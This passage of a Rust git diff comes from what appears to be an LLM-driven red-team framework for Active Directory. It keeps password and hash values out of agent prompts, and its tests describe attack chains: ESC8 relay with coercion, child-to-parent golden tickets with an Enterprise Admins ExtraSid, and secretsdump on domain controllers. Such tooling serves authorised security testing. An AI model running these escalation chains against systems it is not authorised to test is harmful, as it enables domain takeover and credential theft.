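    let payload = json!({ "username": "Administrator", "admin_hash": "aabbccdd" });
    // The template receives only this label, never the hash itself.
    let source_auth = if present(&payload, "password") {
        "password"
    } else if present(&payload, "admin_hash") {
        "nthash"
    } else {
        "missing"
    };
    assert_eq!(source_auth, "nthash");
}
```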
use serde_json::Value; use tera::Context; @@ -28,10 +34,16 @@ pub(crate) fn generate_trust_key_prompt( .get("username") .and_then(|v| v.as_str()) .unwrap_or("Administrator"); - let password = payload + let payload_password_present = payload .get("password") .and_then(|v| v.as_str()) - .unwrap_or(""); + .map(|s| !s.is_empty()) + .unwrap_or(false); + let payload_admin_hash_present = payload + .get("admin_hash") + .and_then(|v| v.as_str()) + .map(|s| !s.is_empty()) + .unwrap_or(false); let dc_ip = payload .get("dc_ip") .and_then(|v| v.as_str()) @@ -44,25 +56,16 @@ pub(crate) fn generate_trust_key_prompt( .get("target_sid") .and_then(|v| v.as_str()) .unwrap_or(""); - let trust_key = payload + let trust_key_present = payload .get("trust_key") .and_then(|v| v.as_str()) - .unwrap_or(""); - - // Look up password from state if not in payload - let password = if password.is_empty() { - if let Some(s) = state { - s.credentials - .iter() - .find(|c| c.username.eq_ignore_ascii_case(username) && !c.password.is_empty()) - .map(|c| c.password.as_str()) - .unwrap_or("") - } else { - "" - } - } else { - password - }; + .map(|s| !s.is_empty()) + .unwrap_or(false); + let child_krbtgt_in_payload = payload + .get("child_krbtgt_hash") + .and_then(|v| v.as_str()) + .map(|s| !s.is_empty()) + .unwrap_or(false); // Determine if this is a child-to-parent escalation (same forest). let vuln_type = payload @@ -75,11 +78,54 @@ pub(crate) fn generate_trust_key_prompt( .to_lowercase() .ends_with(&format!(".{}", trusted_domain.to_lowercase()))); - let has_trust_key = !trust_key.is_empty(); + // Source DA availability — we have a usable creator credential if either + // the payload carried one OR state has a credential/hash for the principal + // in the source domain. The values themselves are never inserted into ctx. 
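The state-side half of `has_source_da` follows in the next hunk; as a self-contained miniature with a stub credential record (the real `StateSnapshot` carries more fields), the lookup is a case-insensitive presence scan whose value never escapes:

```rust
// Presence-only scan of harvested state: does any credential match the
// principal? The password value itself never leaves this function.
struct Cred {
    username: String,
    domain: String,
    password: String,
}

fn state_has_password(creds: &[Cred], user: &str, domain: &str) -> bool {
    creds.iter().any(|c| {
        c.username.eq_ignore_ascii_case(user)
            && c.domain.eq_ignore_ascii_case(domain)
            && !c.password.is_empty()
    })
}

fn main() {
    let creds = vec![Cred {
        username: "Administrator".into(),
        domain: "contoso.local".into(),
        password: "never-rendered".into(),
    }];
    assert!(state_has_password(&creds, "administrator", "CONTOSO.LOCAL"));
}
```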
+ let state_has_password = state + .map(|s| { + s.credentials.iter().any(|c| { + c.username.eq_ignore_ascii_case(username) + && c.domain.eq_ignore_ascii_case(domain) + && !c.password.is_empty() + }) + }) + .unwrap_or(false); + let state_has_hash = state + .map(|s| { + s.hashes.iter().any(|h| { + h.username.eq_ignore_ascii_case(username) + && h.domain.eq_ignore_ascii_case(domain) + && !h.hash_value.is_empty() + }) + }) + .unwrap_or(false); + let has_source_da = payload_password_present + || payload_admin_hash_present + || state_has_password + || state_has_hash; + + let source_auth = if payload_password_present || state_has_password { + "password" + } else if payload_admin_hash_present || state_has_hash { + "nthash" + } else { + "missing" + }; + + let has_trust_key = trust_key_present + || state + .map(|s| { + s.hashes.iter().any(|h| { + h.username + .to_uppercase() + .ends_with(&format!("{}$", trusted_domain_short(trusted_domain))) + && h.domain.eq_ignore_ascii_case(domain) + }) + }) + .unwrap_or(false); let needs_source_sid = source_sid.is_empty(); let needs_target_sid = target_sid.is_empty(); - // Compute dynamic step numbers let mut step = 1u32; let step_extract = step; if !has_trust_key { @@ -106,17 +152,30 @@ pub(crate) fn generate_trust_key_prompt( .and_then(|v| v.as_str()) .unwrap_or(dc_ip); - let trust_key_or_placeholder = if has_trust_key { - trust_key + let target_dc_hostname = if let Some(s) = state { + s.hosts + .iter() + .find(|h| h.ip == target_dc_hint && !h.hostname.is_empty()) + .map(|h| h.hostname.clone()) + .or_else(|| { + s.hosts + .iter() + .find(|h| { + h.is_dc + && h.hostname + .to_lowercase() + .ends_with(&format!(".{}", trusted_domain.to_lowercase())) + }) + .map(|h| h.hostname.clone()) + }) + .unwrap_or_default() } else { - "" + String::new() }; - let trust_key_val = if has_trust_key { - trust_key - } else { - "" - }; + // SIDs are non-secret — they CAN be inserted (they identify the domain, + // not authenticate it). Empty values become an explicit placeholder so the + // template branch communicates "not yet known". let source_sid_val = if source_sid.is_empty() { "" } else { @@ -133,11 +192,18 @@ pub(crate) fn generate_trust_key_prompt( target_sid }; - // Admin hash for hash-based raiseChild auth (used when password is empty) - let admin_hash = payload - .get("admin_hash") - .and_then(|v| v.as_str()) - .unwrap_or(""); + // child krbtgt: only need a flag, not the value. 
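Before the krbtgt flag below, one detail of the trust-key detection above deserves a worked example: the inter-realm trust account in the source domain is named after the trusted domain's NetBIOS short name plus `$`, which is what the `ends_with` match keys on. This repeats `trusted_domain_short` as defined at the end of this file's diff:

```rust
// Same logic as trust.rs's trusted_domain_short: first DNS label, upper-cased.
fn trusted_domain_short(trusted_domain: &str) -> String {
    trusted_domain
        .split('.')
        .next()
        .unwrap_or(trusted_domain)
        .to_uppercase()
}

fn main() {
    let suffix = format!("{}$", trusted_domain_short("fabrikam.local"));
    assert_eq!(suffix, "FABRIKAM$");
    // A hash harvested for CONTOSO's FABRIKAM$ account is the trust key.
    assert!("fabrikam$".to_uppercase().ends_with(&suffix));
}
```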
+ let has_child_krbtgt = child_krbtgt_in_payload + || (is_child_to_parent + && state + .map(|s| { + s.hashes.iter().any(|h| { + h.username.eq_ignore_ascii_case("krbtgt") + && h.domain.eq_ignore_ascii_case(domain) + && h.hash_type.eq_ignore_ascii_case("NTLM") + }) + }) + .unwrap_or(false)); let mut ctx = Context::new(); ctx.insert("task_id", task_id); @@ -145,20 +211,19 @@ pub(crate) fn generate_trust_key_prompt( ctx.insert("trusted_domain", trusted_domain); ctx.insert("dc_ip", dc_ip); ctx.insert("username", username); - ctx.insert("password", password); + ctx.insert("source_auth", source_auth); + ctx.insert("has_source_da", &has_source_da); ctx.insert("has_trust_key", &has_trust_key); - ctx.insert("trust_key", trust_key); ctx.insert("needs_source_sid", &needs_source_sid); ctx.insert("needs_target_sid", &needs_target_sid); ctx.insert("is_child_to_parent", &is_child_to_parent); ctx.insert("trusted_domain_prefix", &trusted_domain_prefix); ctx.insert("target_dc_hint", target_dc_hint); - ctx.insert("trust_key_or_placeholder", trust_key_or_placeholder); - ctx.insert("trust_key_val", trust_key_val); + ctx.insert("target_dc_hostname", &target_dc_hostname); ctx.insert("source_sid_val", source_sid_val); ctx.insert("target_sid_val", target_sid_val); ctx.insert("extra_sid_val", extra_sid_val); - ctx.insert("admin_hash", admin_hash); + ctx.insert("has_child_krbtgt", &has_child_krbtgt); ctx.insert("step_extract", &step_extract); ctx.insert("step_sid", &step_sid); ctx.insert("step_forge", &step_forge); @@ -168,3 +233,11 @@ pub(crate) fn generate_trust_key_prompt( render_template_with_context(TASK_EXPLOIT_TRUST, &ctx) } + +fn trusted_domain_short(trusted_domain: &str) -> String { + trusted_domain + .split('.') + .next() + .unwrap_or(trusted_domain) + .to_uppercase() +} diff --git a/ares-llm/src/prompt/helpers.rs b/ares-llm/src/prompt/helpers.rs index 532df40f..d941c521 100644 --- a/ares-llm/src/prompt/helpers.rs +++ b/ares-llm/src/prompt/helpers.rs @@ -1,4 +1,10 @@ //! Shared helpers for prompt generation. +//! +//! These helpers MUST NOT emit credential values (passwords, hashes, AES keys, +//! ticket bytes) into prompts. The worker resolves credentials from operation +//! state at dispatch time; the LLM only ever sees principals (username/domain) +//! and capability labels ("password", "nthash", "aes256", "ticket"). See +//! `ares-cli/src/worker/credential_resolver.rs` for the resolution path. use serde_json::Value; use tera::Context; @@ -6,7 +12,11 @@ use tera::Context; use super::state_context::format_state_context; use super::StateSnapshot; -/// Extract credential fields from payload into a Tera context. +/// Insert principal-only credential context into a Tera context. +/// Surfaces `credential_username`, `credential_domain`, `credential_auth_type` +/// — never the raw password/hash. Templates that need to brand "we have creds" +/// vs "we don't" can branch on `credential_username` presence; templates that +/// need to brand the auth type can branch on `credential_auth_type`. 
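Sketched as the JSON a template would now see for a password credential (values illustrative), the helper's output is principal plus label with no secret slot:

```rust
use serde_json::json;

fn main() {
    // Context produced by insert_credential_context after this change.
    let ctx = json!({
        "credential_username": "admin",
        "credential_domain": "contoso.local",
        "credential_auth_type": "password"
    });
    assert!(ctx.get("credential_password").is_none());
}
```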
pub(crate) fn insert_credential_context(ctx: &mut Context, payload: &Value) { if let Some(cred) = payload.get("credential") { let user = cred["username"].as_str().unwrap_or(""); @@ -15,13 +25,13 @@ pub(crate) fn insert_credential_context(ctx: &mut Context, payload: &Value) { ctx.insert("credential_username", user); ctx.insert("credential_domain", cred_domain); - let password = cred.get("password").and_then(|v| v.as_str()).unwrap_or(""); - let has_password = !password.is_empty(); - if has_password { - ctx.insert("credential_password", password); - } + let has_password = cred + .get("password") + .and_then(|v| v.as_str()) + .map(|s| !s.is_empty()) + .unwrap_or(false); ctx.insert( - "auth_type", + "credential_auth_type", if has_password { "password" } else { @@ -30,6 +40,12 @@ pub(crate) fn insert_credential_context(ctx: &mut Context, payload: &Value) { ); } } + // Surface bind_domain so templates can instruct the LLM to use it + if let Some(bd) = payload.get("bind_domain").and_then(|v| v.as_str()) { + if !bd.is_empty() { + ctx.insert("bind_domain", bd); + } + } } /// Insert formatted state context into a Tera context. @@ -83,10 +99,12 @@ pub(crate) fn payload_techniques(payload: &Value) -> Vec { .unwrap_or_default() } -/// Extract password from payload — checks nested `credential.password` first, -/// then flat top-level `password` (matches both dispatcher shapes). -fn extract_password(payload: &Value) -> Option<&str> { - payload +/// Capability label for a payload's credential. +/// +/// Returns one of: `"password"`, `"nthash"`, `"none"`. The label is **non-secret** +/// — it tells the LLM what auth class will be auto-resolved, not the value. +pub(crate) fn cred_capability_label(payload: &Value, hash_value: Option<&str>) -> &'static str { + let has_password = payload .get("credential") .and_then(|c| c.get("password")) .and_then(|v| v.as_str()) @@ -97,28 +115,14 @@ fn extract_password(payload: &Value) -> Option<&str> { .and_then(|v| v.as_str()) .filter(|s| !s.is_empty()) }) -} - -/// Build the credential parameter string for technique call sites. -pub(crate) fn cred_param_str(payload: &Value, hash_value: Option<&str>) -> String { - if let Some(pw) = extract_password(payload) { - return format!("password='{pw}'"); - } - if let Some(h) = hash_value { - return format!("hashes='{h}'"); - } - "password='N/A'".to_string() -} - -/// Build the credential display string. 
-pub(crate) fn cred_display_str(payload: &Value, hash_value: Option<&str>) -> String { - if let Some(pw) = extract_password(payload) { - return pw.to_string(); - } - if let Some(h) = hash_value { - return format!("[HASH] {h}"); + .is_some(); + if has_password { + "password" + } else if hash_value.is_some() { + "nthash" + } else { + "none" } - "N/A".to_string() } #[cfg(test)] @@ -164,7 +168,6 @@ mod tests { #[test] fn pth_compat_lm_empty_nt_valid() { - // Empty LM part with valid NT assert!(is_pass_the_hash_compatible(Some( ":313b6f423a71d74c0a1b8a2f43b22d4c" ))); @@ -192,79 +195,43 @@ mod tests { } #[test] - fn cred_param_str_password() { - let payload = json!({"password": "P@ss1"}); - assert_eq!(cred_param_str(&payload, None), "password='P@ss1'"); + fn cred_capability_password() { + let payload = json!({"password": "secret"}); + assert_eq!(cred_capability_label(&payload, None), "password"); } #[test] - fn cred_param_str_nested_password() { - let payload = json!({"credential": {"username": "admin", "domain": "contoso.local", "password": "Summer2025"}}); - assert_eq!(cred_param_str(&payload, None), "password='Summer2025'"); + fn cred_capability_nested_password() { + let payload = json!({"credential": {"password": "secret"}}); + assert_eq!(cred_capability_label(&payload, None), "password"); } #[test] - fn cred_param_str_nested_takes_precedence() { - let payload = json!({"password": "flat", "credential": {"password": "nested"}}); - assert_eq!(cred_param_str(&payload, None), "password='nested'"); - } - - #[test] - fn cred_param_str_hash() { + fn cred_capability_hash_only() { let payload = json!({}); - assert_eq!( - cred_param_str(&payload, Some("aabbccdd")), - "hashes='aabbccdd'" - ); + assert_eq!(cred_capability_label(&payload, Some("aabb")), "nthash"); } #[test] - fn cred_param_str_fallback() { + fn cred_capability_none() { let payload = json!({}); - assert_eq!(cred_param_str(&payload, None), "password='N/A'"); + assert_eq!(cred_capability_label(&payload, None), "none"); } #[test] - fn cred_param_str_empty_password_uses_hash() { - let payload = json!({"password": ""}); - assert_eq!(cred_param_str(&payload, Some("aabb")), "hashes='aabb'"); - } - - #[test] - fn cred_param_str_nested_empty_uses_hash() { - let payload = json!({"credential": {"password": ""}}); - assert_eq!(cred_param_str(&payload, Some("aabb")), "hashes='aabb'"); - } - - #[test] - fn cred_display_str_password() { - let payload = json!({"password": "Secret123"}); - assert_eq!(cred_display_str(&payload, None), "Secret123"); - } - - #[test] - fn cred_display_str_nested_password() { - let payload = json!({"credential": {"password": "Summer2025"}}); - assert_eq!(cred_display_str(&payload, None), "Summer2025"); + fn cred_capability_password_takes_precedence() { + let payload = json!({"password": "secret"}); + assert_eq!(cred_capability_label(&payload, Some("aabb")), "password"); } #[test] - fn cred_display_str_hash() { - let payload = json!({}); - assert_eq!( - cred_display_str(&payload, Some("aabbccdd")), - "[HASH] aabbccdd" - ); - } - - #[test] - fn cred_display_str_fallback() { - let payload = json!({}); - assert_eq!(cred_display_str(&payload, None), "N/A"); + fn cred_capability_empty_password_falls_back_to_hash() { + let payload = json!({"password": ""}); + assert_eq!(cred_capability_label(&payload, Some("aabb")), "nthash"); } #[test] - fn insert_credential_context_with_password() { + fn insert_credential_context_with_password_does_not_leak_value() { let payload = json!({ "credential": { "username": "admin", @@ -277,8 +244,11 @@ 
mod tests { let json = ctx.into_json(); assert_eq!(json["credential_username"], "admin"); assert_eq!(json["credential_domain"], "contoso.local"); - assert_eq!(json["credential_password"], "P@ss1"); - assert_eq!(json["auth_type"], "password"); + assert_eq!(json["credential_auth_type"], "password"); + assert!( + json.get("credential_password").is_none(), + "credential_password must never be exposed to templates" + ); } #[test] @@ -292,7 +262,8 @@ mod tests { let mut ctx = Context::new(); insert_credential_context(&mut ctx, &payload); let json = ctx.into_json(); - assert_eq!(json["auth_type"], "hash/ticket"); + assert_eq!(json["credential_auth_type"], "hash/ticket"); + assert!(json.get("credential_password").is_none()); } #[test] @@ -302,5 +273,6 @@ mod tests { insert_credential_context(&mut ctx, &payload); let json = ctx.into_json(); assert!(json.get("credential_username").is_none()); + assert!(json.get("credential_password").is_none()); } } diff --git a/ares-llm/src/prompt/mod.rs b/ares-llm/src/prompt/mod.rs index d7528eda..8ea50c9e 100644 --- a/ares-llm/src/prompt/mod.rs +++ b/ares-llm/src/prompt/mod.rs @@ -75,6 +75,7 @@ pub fn generate_task_prompt( privesc::generate_privesc_enumeration_prompt(task_id, payload, state) } "acl_analysis" => acl::generate_acl_analysis_prompt(task_id, payload, state), + "acl_chain_step" => acl::generate_acl_chain_step_prompt(task_id, payload, state), "command" => command::generate_command_prompt(task_id, payload), _ => return None, }; diff --git a/ares-llm/src/prompt/recon.rs b/ares-llm/src/prompt/recon.rs index 8c098d09..443c6c9a 100644 --- a/ares-llm/src/prompt/recon.rs +++ b/ares-llm/src/prompt/recon.rs @@ -34,6 +34,28 @@ pub(crate) fn generate_recon_prompt( ctx.insert("techniques", &techniques); } + // Single technique (e.g. certipy_find, ldap_group_enumeration) + if let Some(technique) = payload["technique"].as_str() { + ctx.insert("technique", technique); + } + + // Task-specific instructions (e.g. certipy commands, LDAP queries) + if let Some(instructions) = payload["instructions"].as_str() { + ctx.insert("instructions", instructions); + } + + // Surface the principal that owns a usable NTLM hash so the LLM can + // reference it by name. The hash value itself is never inserted — the + // worker injects the hash at dispatch from operation state. 
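The branch below implements this surfacing; as a standalone sketch of the resulting flags (payload values illustrative):

```rust
use serde_json::json;

fn main() {
    // Principal named, hash value absent: the prompt can say who owns the
    // hash while the worker supplies the hash itself at dispatch.
    let payload = json!({ "technique": "certipy_find", "hash_username": "svc_ca" });
    let hash_username = payload["hash_username"].as_str().unwrap_or("");
    let has_ntlm_hash =
        !hash_username.is_empty() || payload["ntlm_hash"].as_str().is_some();
    assert!(has_ntlm_hash);
    assert_eq!(hash_username, "svc_ca");
}
```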
+ if let Some(hash_username) = payload["hash_username"].as_str() { + if !hash_username.is_empty() { + ctx.insert("hash_username", hash_username); + ctx.insert("has_ntlm_hash", &true); + } + } else if payload["ntlm_hash"].as_str().is_some() { + ctx.insert("has_ntlm_hash", &true); + } + insert_state_context(&mut ctx, state, "recon", payload["target_ip"].as_str()); render_template_with_context(TASK_RECON, &ctx) diff --git a/ares-llm/src/prompt/templates.rs b/ares-llm/src/prompt/templates.rs index 51c369f1..bed029ef 100644 --- a/ares-llm/src/prompt/templates.rs +++ b/ares-llm/src/prompt/templates.rs @@ -45,6 +45,8 @@ const TASK_PRIVESC_ENUMERATION_TEMPLATE: &str = include_str!("../../templates/redteam/tasks/privesc_enumeration.md.tera"); const TASK_ACL_ANALYSIS_TEMPLATE: &str = include_str!("../../templates/redteam/tasks/acl_analysis.md.tera"); +const TASK_ACL_CHAIN_STEP_TEMPLATE: &str = + include_str!("../../templates/redteam/tasks/acl_chain_step.md.tera"); const TASK_COMMAND_TEMPLATE: &str = include_str!("../../templates/redteam/tasks/command.md.tera"); const TASK_EXPLOIT_ADCS_ENUMERATE_TEMPLATE: &str = @@ -144,6 +146,7 @@ pub const TASK_LATERAL: &str = "redteam/tasks/lateral"; pub const TASK_COERCION: &str = "redteam/tasks/coercion"; pub const TASK_PRIVESC_ENUMERATION: &str = "redteam/tasks/privesc_enumeration"; pub const TASK_ACL_ANALYSIS: &str = "redteam/tasks/acl_analysis"; +pub const TASK_ACL_CHAIN_STEP: &str = "redteam/tasks/acl_chain_step"; pub const TASK_COMMAND: &str = "redteam/tasks/command"; // Exploit task templates @@ -231,6 +234,7 @@ static TEMPLATES: LazyLock<Tera> = LazyLock::new(|| { (TASK_COERCION, TASK_COERCION_TEMPLATE), (TASK_PRIVESC_ENUMERATION, TASK_PRIVESC_ENUMERATION_TEMPLATE), (TASK_ACL_ANALYSIS, TASK_ACL_ANALYSIS_TEMPLATE), + (TASK_ACL_CHAIN_STEP, TASK_ACL_CHAIN_STEP_TEMPLATE), (TASK_COMMAND, TASK_COMMAND_TEMPLATE), // Exploit task templates ( @@ -371,9 +375,12 @@ pub fn render_agent_instructions_with_extras( /// - `all_capabilities`: map of role → tool list. Falls back to hardcoded defaults if None. /// - `technique_priorities`: sorted list of (technique, weight) pairs for the priority table. /// If provided, renders a dynamic "ATTACK FALLBACK CHAINS" section. +/// - `listener_ip`: orchestrator's relay/listener IP. Surfaced to the LLM so it +/// doesn't hallucinate a subnet-gateway IP for `listener_ip`/`attacker_ip` args.
pub fn render_system_instructions( all_capabilities: Option<&HashMap<String, Vec<String>>>, technique_priorities: Option<&[(String, i32)]>, + listener_ip: Option<&str>, ) -> Result<String> { let mut ctx = Context::new(); if let Some(caps) = all_capabilities { @@ -382,6 +389,9 @@ if let Some(priorities) = technique_priorities { ctx.insert("technique_priorities", priorities); } + if let Some(ip) = listener_ip { + ctx.insert("listener_ip", ip); + } TEMPLATES .render(TEMPLATE_SYSTEM_INSTRUCTIONS, &ctx) @@ -517,14 +527,14 @@ mod tests { caps.insert("privesc".to_string(), vec!["certipy".to_string()]); caps.insert("lateral".to_string(), vec!["psexec".to_string()]); - let result = render_system_instructions(Some(&caps), None).unwrap(); + let result = render_system_instructions(Some(&caps), None, None).unwrap(); assert!(result.contains("RECON")); assert!(result.contains("nmap_scan")); } #[test] fn render_system_instructions_without_capabilities() { - let result = render_system_instructions(None, None).unwrap(); + let result = render_system_instructions(None, None, None).unwrap(); // Falls back to hardcoded defaults assert!(result.contains("nmap, netexec, rpcclient")); // Hardcoded fallback table @@ -541,7 +551,7 @@ ("esc1".to_string(), 5), ("acl_abuse".to_string(), 6), ]; - let result = render_system_instructions(None, Some(&priorities)).unwrap(); + let result = render_system_instructions(None, Some(&priorities), None).unwrap(); // Dynamic table rendered assert!( result.contains("operator strategy"), @@ -557,6 +567,28 @@ ); } + #[test] + fn render_system_instructions_with_listener_ip() { + let result = render_system_instructions(None, None, Some("192.168.58.178")).unwrap(); + assert!( + result.contains("192.168.58.178"), + "Listener IP should be substituted into prompt" + ); + assert!( + result.contains("OPERATOR INFRASTRUCTURE"), + "Listener IP section should render when value is provided" + ); + } + + #[test] + fn render_system_instructions_omits_listener_section_when_unset() { + let result = render_system_instructions(None, None, None).unwrap(); + assert!( + !result.contains("OPERATOR INFRASTRUCTURE"), + "Listener IP section should be hidden when no IP provided" + ); + } + #[test] fn render_initial_task() { let mut vars = HashMap::new(); diff --git a/ares-llm/src/prompt/tests.rs b/ares-llm/src/prompt/tests.rs index 793b101b..361e08ff 100644 --- a/ares-llm/src/prompt/tests.rs +++ b/ares-llm/src/prompt/tests.rs @@ -257,7 +257,13 @@ fn credaccess_low_hanging_fruit_with_creds() { assert!(prompt.contains("LOW HANGING FRUIT credential harvesting")); assert!(prompt.contains("gpp_password_finder")); assert!(prompt.contains("sysvol_script_search")); - assert!(prompt.contains("P@ss1")); + // Worker auto-resolves credentials at dispatch — the password value must + // never appear in the LLM-facing prompt. + assert!( + !prompt.contains("P@ss1"), + "password value leaked into prompt:\n{prompt}" + ); + assert!(prompt.contains("auto-resolved at dispatch")); } #[test] @@ -334,7 +340,14 @@ fn credaccess_technique_enforcement_with_creds() { assert!(prompt.contains("secretsdump(target=")); assert!(prompt.contains("kerberoast(domain=")); assert!(prompt.contains("laps_dump(target=")); - assert!(prompt.contains("P@ss1")); + // Password must never appear in LLM-facing prompts. Schema stripping plus + // the worker resolver injects the credential at dispatch.
+ assert!( + !prompt.contains("P@ss1"), + "password value leaked into prompt:\n{prompt}" + ); + assert!(!prompt.contains("password='")); + assert!(prompt.contains("Auth: password (auto-resolved at dispatch")); } #[test] @@ -348,7 +361,12 @@ fn credaccess_technique_enforcement_with_hash() { }); let prompt = generate_task_prompt("credential_access", "t-8", &payload, None).unwrap(); assert!(prompt.contains("MANDATORY TECHNIQUE EXECUTION")); - assert!(prompt.contains("hashes=")); + // Hash values are auto-resolved by the worker — the prompt must not echo + // the hash, and signatures must not include `hashes=` / `nthash=` params. + assert!(!prompt.contains("aad3b435b51404eeaad3b435b51404ee")); + assert!(!prompt.contains("hashes=")); + assert!(!prompt.contains("nthash=")); + assert!(prompt.contains("Auth: nthash (auto-resolved at dispatch")); assert!(prompt.contains("secretsdump")); } @@ -461,7 +479,12 @@ fn exploit_constrained_delegation_with_state() { assert!(prompt.contains("secretsdump_kerberos")); assert!(prompt.contains("psexec_kerberos")); assert!(prompt.contains("cifs/dc01.contoso.local")); - assert!(prompt.contains("SqlPass1")); + // Password must never appear in LLM-facing prompts — auto-resolved at dispatch. + assert!( + !prompt.contains("SqlPass1"), + "password value leaked into prompt:\n{prompt}" + ); + assert!(!prompt.contains("password='")); assert!(prompt.contains("dc01.contoso.local")); } @@ -511,6 +534,56 @@ fn exploit_adcs_esc8() { assert!(prompt.contains("ntlmrelayx")); assert!(prompt.contains("web enrollment")); assert!(!prompt.contains("certipy_request")); + // No coerce_target field provided -> no "Coerce Target:" header rendered + assert!(!prompt.contains("Coerce Target:")); +} + +#[test] +fn exploit_adcs_esc8_renders_coerce_target_when_present() { + let payload = serde_json::json!({ + "vuln_type": "adcs_esc8", + "target": "192.168.58.15", + "ca_server": "192.168.58.10", + "domain": "contoso.local", + "coerce_target": "192.168.58.20", + "listener_ip": "192.168.58.50", + }); + let prompt = generate_task_prompt("exploit", "t-26", &payload, None).unwrap(); + assert!(prompt.contains("Coerce Target (primary): 192.168.58.20")); + assert!(prompt.contains("Relay Listener: 192.168.58.50")); + assert!(prompt.contains("Coerce 192.168.58.20")); +} + +#[test] +fn exploit_adcs_esc8_renders_fallback_targets() { + let payload = serde_json::json!({ + "vuln_type": "adcs_esc8", + "target": "192.168.58.15", + "ca_server": "192.168.58.10", + "domain": "contoso.local", + "coerce_target": "192.168.58.20", + "coerce_targets": ["192.168.58.20", "192.168.58.30", "192.168.58.51"], + "listener_ip": "192.168.58.50", + }); + let prompt = generate_task_prompt("exploit", "t-26b", &payload, None).unwrap(); + assert!(prompt.contains("Fallback Coerce Targets")); + assert!(prompt.contains("192.168.58.30")); + assert!(prompt.contains("192.168.58.51")); +} + +#[test] +fn exploit_adcs_esc8_omits_fallback_block_when_only_one_candidate() { + let payload = serde_json::json!({ + "vuln_type": "adcs_esc8", + "target": "192.168.58.15", + "ca_server": "192.168.58.10", + "domain": "contoso.local", + "coerce_target": "192.168.58.20", + "coerce_targets": ["192.168.58.20"], + "listener_ip": "192.168.58.50", + }); + let prompt = generate_task_prompt("exploit", "t-26c", &payload, None).unwrap(); + assert!(!prompt.contains("Fallback Coerce Targets")); } #[test] @@ -549,6 +622,49 @@ fn exploit_child_to_parent_has_raise_child() { assert!(prompt.contains("Enterprise Admins")); } +#[test] +fn 
exploit_child_to_parent_offers_extra_sid_via_child_krbtgt() { + let payload = serde_json::json!({ + "vuln_type": "child_to_parent", + "target": "192.168.58.10", + "domain": "child.contoso.local", + "trusted_domain": "contoso.local", + "username": "Administrator", + "password": "P@ss1", + "dc_ip": "192.168.58.10", + "source_sid": "S-1-5-21-1111-2222-3333", + "target_sid": "S-1-5-21-4444-5555-6666", + "child_krbtgt_hash": "8c6d94541dbc90f085e86828428d2cbf", + }); + let prompt = generate_task_prompt("exploit", "t-32", &payload, None).unwrap(); + // ExtraSid via child krbtgt — generate_golden_ticket with extra_sid pointing + // at the parent's Enterprise Admins SID (RID 519). + assert!(prompt.contains("INTRA-FOREST CHILD→PARENT")); + assert!(prompt.contains("generate_golden_ticket")); + // krbtgt hash value must never appear — auto-resolved by the worker at dispatch. + assert!( + !prompt.contains("8c6d94541dbc90f085e86828428d2cbf"), + "krbtgt hash leaked into prompt:\n{prompt}" + ); + assert!(!prompt.contains("krbtgt_hash='")); + // Domain SIDs are non-secret identifiers and CAN appear; ExtraSid still + // shows the RID-519 form so the LLM understands what to compute. + assert!(prompt.contains("S-1-5-21-4444-5555-6666-519")); + // Followed by secretsdump_kerberos on the parent DC. + assert!(prompt.contains("secretsdump_kerberos")); + // The intra-forest path should NOT *invoke* extract_trust_key/get_sid/ + // create_inter_realm_ticket — those are unnecessary when the child krbtgt + // is in hand and previously caused the LLM to bail out on empty creds. + // We allow the names to appear in a "Do NOT call" instruction but never + // as actual function-call syntax. + assert!(!prompt.contains("extract_trust_key(")); + assert!(!prompt.contains("create_inter_realm_ticket(")); + assert!(prompt.contains("Do NOT call extract_trust_key")); + // Fallbacks for SPN target name validation / DRSUAPI hardening. + assert!(prompt.contains("just_dc_user='krbtgt'")); + assert!(prompt.contains("use_vss=true")); +} + #[test] fn exploit_mssql_lateral_enumeration() { let state = StateSnapshot { diff --git a/ares-llm/src/routing/credentials.rs b/ares-llm/src/routing/credentials.rs index ff72f614..c37cc46e 100644 --- a/ares-llm/src/routing/credentials.rs +++ b/ares-llm/src/routing/credentials.rs @@ -11,8 +11,9 @@ use super::domain::normalize_domain; /// Enforces AD trust-scope rules: /// - Same domain: always valid /// - Parent → child: parent-domain creds can authenticate to child domain LDAP -/// - Child → parent: blocked (child creds cannot auth to parent LDAP) -/// - Cross-forest: blocked for direct LDAP authentication +/// - Child → parent: valid (NTLM/Kerberos auth traverses parent-child trust) +/// - Cross-forest bidirectional: valid (NTLM auth traverses forest trust) +/// - Cross-forest one-way inbound only: blocked pub fn is_valid_credential_for_domain( cred_domain: &str, target_domain: &str, @@ -32,15 +33,24 @@ pub fn is_valid_credential_for_domain( return true; } - // Child → parent: blocked + // Child → parent: valid — NTLM/Kerberos authentication traverses the + // parent-child trust bidirectionally. The target DC forwards the auth + // request to the child domain DC via the trust's secure channel. // e.g. 
cred=north.contoso.local, target=contoso.local if cred_lower.ends_with(&format!(".{target_lower}")) { - return false; + return true; } - // Cross-forest: block if either side is a known trust - if trusted_domains.contains_key(&target_lower) || trusted_domains.contains_key(&cred_lower) { - return false; + // Cross-forest: allow if bidirectional trust exists + if let Some(trust) = trusted_domains.get(&target_lower) { + if trust.direction == "bidirectional" || trust.direction == "outbound" { + return true; + } + } + if let Some(trust) = trusted_domains.get(&cred_lower) { + if trust.direction == "bidirectional" || trust.direction == "inbound" { + return true; + } } // Unknown relationship: block by default (cross-domain LDAP without trust info is risky) @@ -188,9 +198,9 @@ mod tests { } #[test] - fn child_to_parent_blocked() { + fn child_to_parent_valid() { let trusts = HashMap::new(); - assert!(!is_valid_credential_for_domain( + assert!(is_valid_credential_for_domain( "north.contoso.local", "contoso.local", &trusts @@ -198,7 +208,7 @@ } #[test] - fn cross_forest_blocked() { + fn cross_forest_bidirectional_valid() { let mut trusts = HashMap::new(); trusts.insert( "fabrikam.local".to_string(), @@ -210,6 +220,17 @@ sid_filtering: true, }, ); + assert!(is_valid_credential_for_domain( + "contoso.local", + "fabrikam.local", + &trusts + )); + } + + #[test] + fn cross_forest_no_trust_blocked() { + let trusts = HashMap::new(); + // No trust info at all → blocked assert!(!is_valid_credential_for_domain( "contoso.local", "fabrikam.local", @@ -228,11 +249,12 @@ } #[test] - fn child_cred_blocked_for_parent_domain() { + fn child_cred_valid_for_parent_domain() { let trusts = HashMap::new(); let creds = vec![make_cred("admin", "north.contoso.local", "P@ss1")]; let map = HashMap::new(); let found = find_domain_credential("contoso.local", &creds, &map, &trusts); - assert!(found.is_none()); + assert!(found.is_some()); + assert_eq!(found.unwrap().domain, "north.contoso.local"); } } diff --git a/ares-llm/src/tool_registry/blue/state.rs b/ares-llm/src/tool_registry/blue/state.rs index a92085c0..3ac83e4f 100644 --- a/ares-llm/src/tool_registry/blue/state.rs +++ 